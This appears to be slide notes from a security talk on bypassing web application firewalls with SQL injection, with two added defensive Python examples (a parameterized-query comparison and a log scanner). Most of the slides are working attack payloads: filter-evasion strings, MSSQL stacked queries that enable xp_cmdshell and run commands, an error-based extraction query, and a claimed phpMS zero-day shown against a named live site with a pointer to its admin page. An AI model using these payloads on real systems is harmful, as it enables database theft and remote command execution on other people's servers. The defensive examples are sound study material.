By Francis Alexander
• Got listed on the eBay and Microsoft security researchers lists
• Worked as a freelance security researcher for tech2.in.com and in.com
• Found SQLi vulnerabilities at the Kerala entrance portal website
• http://tech2.in.com/news/general/updated-serious-vulnerability-affects-kerala-common-entrance-exams-portal/369982
• Basically the InfoSec Researcher Guy :)
Strictly WAF-based and real-life scenarios
MSSQL stacked queries (thought it a good add-on)
A phpMS 0-day
First among the OWASP Top 10 vulnerabilities
Used for gaining access to the SQL database and hence the box
Mainly of 5 types:
 Union based
 Error based
 XPath based
 Blind and time based
 Double query based
So what's the catch here!!!
Pentesting real-life scenarios is more difficult than ever
SQLi has been patched, and firewalls, IDS and IPS are installed everywhere
Exploiting SQLi has become difficult and the tools have disappointed too!
Of course, failure of sqlmap!!!
Failure of Havij, which by the way is always a failure :p
IDS, IPS and the rest of the firewall family
Apache security modules: mod_sec, htmlentities, mysql_escape, magic_quotes and all my dear appsec modules
What are they!!?
Well, we need to overcome the situation that has come rather than sit and lament over it
Here we will be focusing on the real-life scenarios where the tools fail and much of our human hard work comes in
preg_match is PHP's regular-expression matching function
Mainly deployed by small-scale WAFs; the poorly coded ones are the easier example
Used when "select" followed by any letter is blocked: 'select'+'[A-Za-z]'
So any letter after select gets filtered out
Solution
MySQL has user-defined (stored) variables: "@" is a prefix that denotes stored procedure and function parameter names and variable names.
So how do we do it?
union select 1,2,3-- - = 403 Forbidden
So it changes to
and (@:=version()) union select 1,@,3-- - = bypassed
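As an added illustration, not from the deck: a small Python model of the blocklist described on these slides next to the fix that removes the bug class altogether. Everything here is constructed: the regex models the slide's description of the filter as "select followed by a letter" (the real rule is not shown), the `items` table is sample data, and `lookup_concatenated` / `lookup_parameterized` are hypothetical application functions. SQLite stands in for MySQL, so the letterless payload `0 union select 99,9` is used in place of the deck's `@` variable trick; both pass the same filter for the same reason.

```python
import re
import sqlite3

# Weak blocklist in the style of the preg_match check described on the slide:
# reject the request when "select" is followed (after optional spaces) by a
# letter. Constructed to model the slide's description; not any real WAF rule.
WEAK_FILTER = re.compile(r"select\s*[A-Za-z]", re.IGNORECASE)

def weak_filter_blocks(value: str) -> bool:
    """True when the blocklist would answer 403 for this parameter value."""
    return WEAK_FILTER.search(value) is not None

def make_db() -> sqlite3.Connection:
    """In-memory table standing in for the application's database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "apple"), (2, "pear"), (3, "plum")])
    return conn

def lookup_concatenated(conn: sqlite3.Connection, raw_id: str) -> list:
    """Vulnerable (kept that way on purpose): the request value is spliced into
    the SQL text, so anything the blocklist lets through is parsed as SQL."""
    return conn.execute(f"SELECT id, name FROM items WHERE id = {raw_id}").fetchall()

def lookup_parameterized(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened: the value travels as a bound parameter, never as SQL text.
    A non-numeric id matches no row instead of changing the query."""
    return conn.execute("SELECT id, name FROM items WHERE id = ?", (raw_id,)).fetchall()

def compare(raw_id: str) -> dict:
    """Run one request value through the blocklist and both query styles."""
    conn = make_db()
    blocked = weak_filter_blocks(raw_id)
    return {
        "blocked_by_filter": blocked,
        # The filter sits in front of the vulnerable code, so a blocked request never reaches it.
        "concatenated": None if blocked else lookup_concatenated(conn, raw_id),
        "parameterized": lookup_parameterized(conn, raw_id),
    }

if __name__ == "__main__":
    # "select version()" has a letter after select and is blocked; a select list
    # made only of digits slips past the same rule, which is the gap the slide
    # fills with a stored @variable. The parameterized query is unaffected either way.
    for value in ("2", "0 union select version()", "0 union select 99,9"):
        print(repr(value), compare(value))
```

The dictionary returned for `0 union select 99,9` shows the concatenated query returning a row the application never stored while the parameterized query returns nothing; the blocklist is irrelevant to the second outcome, which is why parameterization, not a longer regex, is the fix.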
 So what's the catch here
 Most of us love the dork inurl:php?id= site:blah.com
 So what has happened is that most admins have moved the id= parameter into the URL path, making the tools go reckless and n00bs go mad
 An example: the usual way was site.com/index.php?id= ; now they have gone and changed it to site.com/index-goods-12.html
 An example site that has no point of injection at first sight
 Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je-suis-prete,884.html
SQL Injections With Real Life Scenarios
The usual commenting style should be followed here, i.e. "-- "; otherwise other forms like %23 (#) and /* could cause the rest of the statement to be misinterpreted as a comment, commenting out the remainder and not letting the .html part be read
In most cases where these types of injection are encountered there are white spaces, which often cause havoc and are a nightmare for scanners
 Well, dealing with white spaces depends on the scenario
 You could use the traditional commenting style like
 id=3/**/union/**/select 1,2,3 or
 Well, the problem is /**/ might be filtered in some cases
 So we use parentheses (), which execute the query the same way
 id=(2)union(select(1),2,3)
 NB: during HTML-based injections it is better to use the parentheses
 Based on Error 1222
 Came across CTFs where the answer had to be found with a normal union-based injection.
 Most tools fail here since the vulnerable column is rendered in between the HTML tags.
 Usually union statements go through here but the columns do not get displayed.
 So what do we do?
 Please don't say we look over the source, because you're not going to find anything at the first shot :)
We do this by changing the traditional union select 1,2,3 to union select 1111,2222,3333
This helps us to search for the markers in the source, though they are still not visible on screen.
If you would like to display it on screen, you could use the concat or group_concat functions with HTML inside them
Use the hex of the HTML if quotes are blocked due to magic quotes
Here we could see the version on closing the "</title>" tag, since the vulnerable column was being displayed within the title block
Bypassing errors 400/403/404/406
 //convert(group_concat(schema_name) using ascii) from information_schema.schemata-- -
 C-style commenting: /*!Union*/+/*!Select*/
 // unlike an ordinary comment, MySQL executes the contents of a /*! ... */ comment
 Character encoding: bypasses filters like 400
 %55nion/**/%53elect
 Sub-queries: union (select 1,2,3)
 // where most WAFs fail
 id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a
 // # starts a comment, but the %0A newline ends it, so the statement still gets executed
Bypassing Error 1064
 Usually related to blocking of white spaces
 id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
 // the queries are supplied in parentheses so as to avoid the use of white spaces
 "/**/" commenting is also possible
Bypassing Error 500
 and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+
 // WAFs written in C are prone to overflow or act differently when loaded with a bunch of data; giving a large amount of data lets our code execute
Stacked queries are mainly available on MSSQL and PostgreSQL servers
The underlying process is simple: if the cmdshell option is enabled then you are in :)
Stacked query support is checked on the server using 'WAITFOR DELAY hour:min:sec'
For example, EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'-- - would check whether cmdshell is enabled or not depending on the time lag.
 http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'show advanced options', 1-- -
 http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
 http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'xp_cmdshell', 1-- -
 http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
Just to prove that this still exists, a real-life demo :)
http://www.site.com/security.asp?vulnID=123;; CREATE TABLE funkyfresh (data varchar(8000));--
// Creates the table funkyfresh
http://www.site.com/security.asp?vulnID=123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -
// We declare a variable @funky and store the hex equivalent of the command in it
NOTE: 0x77686f616d69 => 'whoami'
 /!*AND*/ 5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM funkyfresh ORDER BY data) ORDER BY data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)))
// Credits to Bernardo's original write-up from Black Hat
// The reason I took it: although a bit complicated, it works seamlessly for no reason
 Read the temp table to get the results, and you need to make sure you deal with the same data type when you do...
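The evasions collected under the 400/403/404/406, 1064 and 500 headings, and the stacked-query probes in the MSSQL section, carry one lesson for the defending side: a rule that inspects the raw request misses them, a rule that normalises first does not. The Python below is an added example and not part of the deck. The access-log lines are constructed and reuse the deck's own request strings (with `#` URL-encoded as %23, as it would appear in a real log); `normalize`, `is_sqli`, `query_string_of` and `scan_log` are names chosen here. The normaliser URL-decodes twice, keeps the body of MySQL's executable /*! ... */ comments, drops ordinary and `#`-to-newline comments, and treats parentheses as separators before a single keyword pattern runs over the result.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample. The request strings reuse the evasions shown on
# the slides (inline /*!..*/ comments, %55nion encoding, parentheses instead of
# spaces, '#' comments cut by %0A newlines, a stacked ';EXEC' query) plus two
# benign requests so false positives can be checked as well.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2014:10:00:01 +0000] "GET /index.php?id=12 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2014:10:00:02 +0000] "GET /search.php?q=select+your+union+representative HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2014:10:00:03 +0000] "GET /index.php?id=1+/*!Union*/+/*!Select*/+1,2,3 HTTP/1.1" 200 733
10.0.0.7 - - [01/Jan/2014:10:00:04 +0000] "GET /index.php?id=1+%55nion/**/%53elect+1,2,3 HTTP/1.1" 200 733
10.0.0.7 - - [01/Jan/2014:10:00:05 +0000] "GET /index-goods-12.html?id=(2)union(select(1),2,3) HTTP/1.1" 200 733
10.0.0.7 - - [01/Jan/2014:10:00:06 +0000] "GET /index.php?id=-1+%231q%0Aunion+all%23qa%0A%23%0Aselect+1,2,3%0A%23a HTTP/1.1" 200 733
10.0.0.9 - - [01/Jan/2014:10:00:07 +0000] "GET /security.asp?vulnID=123;+EXEC+sp_configure+'xp_cmdshell',+1--+- HTTP/1.1" 500 210
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# One pattern over the normalised text is enough once the obfuscation is gone.
SQLI_PATTERN = re.compile(
    r"\bunion\b(?:\s+all)?\s*\(?\s*select\b"  # UNION [ALL] SELECT, "(" allowed in place of a space
    r"|\bwaitfor\s+delay\b"                    # MSSQL time-based probe from the slides
    r"|\bxp_cmdshell\b"                        # command-execution procedure
    r"|;\s*(?:exec|declare)\b",                # a second statement stacked after the first
    re.IGNORECASE,
)

def normalize(raw_query_string: str) -> str:
    """Undo the encodings and comment tricks that a raw-string filter trips over."""
    s = raw_query_string
    for _ in range(2):                 # single and double URL encoding; '+' becomes a space
        s = unquote_plus(s)
    # MySQL executes the body of /*! ... */ comments, so keep that body as SQL text.
    s = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # ordinary comments are dead text
    s = re.sub(r"#[^\n]*", " ", s)                  # '#' comments end at the next newline
    s = s.replace("(", " ( ").replace(")", " ) ")   # parentheses separate tokens like spaces do
    return re.sub(r"\s+", " ", s).strip().lower()

def is_sqli(raw_query_string: str) -> bool:
    """Match the keyword pattern against the normalised query string."""
    return SQLI_PATTERN.search(normalize(raw_query_string)) is not None

def query_string_of(log_line: str) -> str:
    """Pull the query string out of a combined-log-format request line."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group(1):
        return ""
    return m.group(1).split("?", 1)[1]

def scan_log(log_text: str) -> list:
    """Return the client IP of every request whose normalised query string matches."""
    return [line.split(" ", 1)[0]
            for line in log_text.splitlines()
            if is_sqli(query_string_of(line))]

if __name__ == "__main__":
    for ip in scan_log(SAMPLE_LOG):
        print("suspicious request from", ip)
```

Run as a script it prints the five flagged requests and stays silent on the two benign ones, including the one that contains both "select" and "union" as ordinary words. The same normalisation step belongs in front of any signature match in a WAF or SIEM; the signatures themselves can then stay short.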
 0-day by me :)
 phpMS - a free CMS (content management system),
 designed for rapid development and support of web projects of any complexity.
 Features of the phpMS CMS:
 Easy to install;
 Multi-level menus;
 Arbitrary arrangement of blocks;
 Simple module development;
 Access rights
Demo: http://www.rusug.ru/index.php?tree=8&mode=view&id=-7+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6--
# By default 6 columns in most cases seen, so this could be used as the default on sites discovered
# Finding the admin page makes it very easy to exploit :)
# Default admin page is admin.php :-)
Eg: http://www.site.com/admin.php :)
References
 A couple of Black Hat talks and papers
 kaotickreations.blogspot.in (my blog)
 http://websec.wordpress.com/tag/sql-filter-evasion/
